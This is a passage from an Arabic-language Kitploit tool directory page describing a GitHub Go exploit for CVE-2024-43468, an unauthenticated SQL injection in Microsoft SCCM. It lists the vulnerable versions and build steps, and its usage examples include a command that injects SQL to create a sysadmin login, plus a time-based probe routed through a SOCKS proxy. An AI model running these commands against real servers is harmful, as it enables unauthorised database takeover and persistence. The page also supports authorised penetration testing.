Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/nikallass/cve-2024-43468_mtls_go
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقةالفريق الأحمر
GitHubnikallass/cve-2024-43468_mtls_go

CVE-2024-43468_mTLS_go

CVE-2024-43468 إكسبلويت حقن SQL في SCCM (شهادة عميل mTLS غير قابلة للاستخراج من إصدار سلسلة مفاتيح MacOS)

عرض المستودع
322منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-43468 استغلال حقن SQL في SCCM (إصدار شهادات عميل mTLS من سلسلة مفاتيح MacOS)

تنفيذ بلغة Go لاستغلال CVE-2024-43468 الذي يستخدم سلسلة مفاتيح macOS لمصادقة mTLS (بدون الحاجة لتصدير المفاتيح من السلسلة).

بالإضافة إلى ذلك:

  • تمت إضافة دعم للوكيل (proxy) لتجنب استخدام proxychains المزعج.
  • تمت إضافة get_cert_name.py للحصول على الاسم الشائع للشهادة (نعم، يمكنك القيام بذلك يدويًا من واجهة Keychain Access الرسومية)
  • تمت إضافة الكثير من التصحيح (debugging) لمعرفة ما يحدث.

مبني على:

  • الاستغلال الأصلي بلغة Python
  • مثال عميل mTLS بلغة Go

الوصف

يستغل ثغرات حقن SQL غير المصادق عليها في Microsoft Configuration Manager (ConfigMgr / SCCM) والتي تسمح لمهاجم لديه وصول شبكي إلى نقطة الإدارة بتنفيذ استعلامات SQL عشوائية على قاعدة بيانات الموقع.

الإصدارات القابلة للاستغلال:

  • < 2403 (5.00.9128.1024)
  • < 2309 (5.00.9122.1033)
  • < 2303 (5.00.9106.1037)
  • <= 2211

التثبيت

root@kitploit:~
# Clone repository
git clone https://github.com/nikallass/CVE-2024-43468_mTLS_go
cd CVE-2024-43468_mTLS_go

# Install dependencies
go get github.com/google/uuid
go get golang.org/x/net/proxy

# Build
go build -o sccm

الاستخدام

root@kitploit:~
# Show help
./sccm -h

# Basic usage (creating new admin)
./sccm -t https://sccm-mp.local \
       -sql "create login user123 with password = 'Password123'; exec master.dbo.sp_addsrvrolemember 'user123', 'sysadmin'" \
       -cn "CertificateCommonName"

# With custom proxy (check with sleep 5)
./sccm -t https://sccm-mp.local \
       -sql "WAITFOR DELAY '0:0:5'" \
       -cn "CertificateCommonName" \
       -proxy "127.0.0.1:9050"

المعاملات

  • -t : رابط الهدف (مطلوب)
  • -sql : استعلام SQL المراد تنفيذه (مطلوب)
  • -cn : الاسم الشائع للشهادة في سلسلة مفاتيح macOS (مطلوب)
  • -proxy : عنوان وكيل SOCKS5 (الافتراضي: فارغ)

المتطلبات

  • macOS (لتكامل سلسلة المفاتيح)
  • Go 1.16+
  • شهادة عميل في سلسلة مفاتيح macOS
  • اختياري: وكيل SOCKS5

المراجع

  • استشارة Microsoft
  • استشارة Synacktiv
  • مثال عميل mTLS بلغة Go
تنزيل الأداة